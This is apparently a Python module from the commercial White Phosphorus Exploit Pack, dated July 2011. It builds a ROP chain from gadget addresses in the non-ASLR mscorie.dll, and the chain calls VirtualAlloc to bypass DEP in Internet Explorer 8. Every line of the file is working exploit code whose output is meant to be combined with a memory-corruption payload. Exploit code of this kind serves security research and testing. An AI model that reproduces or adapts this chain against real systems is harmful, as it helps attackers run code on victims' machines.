#+-------- --- -
#| White Phosphorus Exploit Pack mscorie.dll DEP Bypass Chain
#|  July 2011
#+--
   
from struct import pack
   
def wp_mscorieDEPBypass(size=2200):
    # White Phosphorus
    # Universal DEP Bypass for IE8 using VirtualAlloc
    #
    # Using the .net2.0 loading of mscorie.dll which is not aslr aware
    # This method was publically disclosed in great work of 
    #   http://xcon.xfocus.net/XCon2010_ChenXie_EN.pdf
    # 
    # web:   http://www.whitephosphorus org
    # mail:  support@whitephosphorus org
    # sales: http://www.immunityinc.com/products-whitephosphorus.shtml  

    size += 76  # This is the size of the DEP bypass + ptr in 
                # relation to the initial ESP

    print "WP> Building IE8 mscorie.dll DEP bypass using VirtualAlloc"
    depBypass = pack('<L', 0x63f05428)  # pop edi;pop esi;ret
    depBypass += pack('<L', 0x63f05b01) # ret
    depBypass += pack('<L', 0x63f05b01) # ret
    depBypass += pack('<L', 0x63f05557) # pop ebp;ret
    depBypass += pack('<L', 0x63f04cb5) # Call [VirtualAlloc];pop ebp;ret
    depBypass += pack('<L', 0x63f054c0) # pop ebx;ret
    depBypass += pack('<L', size)       # {size}
    depBypass += pack('<L', 0x63F01C97) # or eax,80070000;ret
    depBypass += pack('<L', 0x63f05458) # pop edx;ret
    depBypass += pack('<L', 0x00001000) # {type}
    depBypass += pack('<L', 0x63f01e13) # pop ecx;ret
    depBypass += pack('<L', 0x00000040) # {protect}
    depBypass += pack('<L', 0x63f05afa) # pushad;xor eax,C9027563;ret
    depBypass += pack('<L', 0x63f069e3) # call esp
    depBypass += "X" * 20               # slackspace
    
    print "WP> IE8 mscorie.dll DEP Bypass Size: %d Bytes" % len(depBypass) 
    return depBypass